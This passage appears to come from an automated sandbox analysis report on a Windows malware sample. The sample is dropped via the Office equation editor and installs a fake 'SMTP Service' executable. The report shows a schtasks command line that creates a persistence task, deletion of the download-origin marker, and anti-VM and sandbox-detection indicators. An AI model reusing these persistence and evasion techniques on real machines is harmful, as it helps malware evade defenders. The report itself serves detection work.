        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025C3E8 push esp; iretd
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025C640 pushfd ; iretd
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031C0D0 push ds; ret
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00314B50 push eax; retn 0047h
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002EC0D0 push ds; ret
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E4B50 push eax; retn 004Ch
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025C0D0 push ds; ret
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00254B50 push eax; retn 0042h
        Source: ALP.exe.2.drStatic PE information: 0x8C4B6098 [Tue Aug 2 11:29:28 2044 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.26903403564
        Source: initial sampleStatic PE information: section name: .text entropy: 7.26903403564
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ALP.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile opened: C:\Users\user\AppData\Roaming\ALP.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 1272, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 2608, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2668, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2796, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: ALP.exe, 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, ALP.exe, 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: ALP.exe, 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, ALP.exe, 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2644Thread sleep time: -35196s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1440Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1832Thread sleep time: -922337203685477s >= -30000s
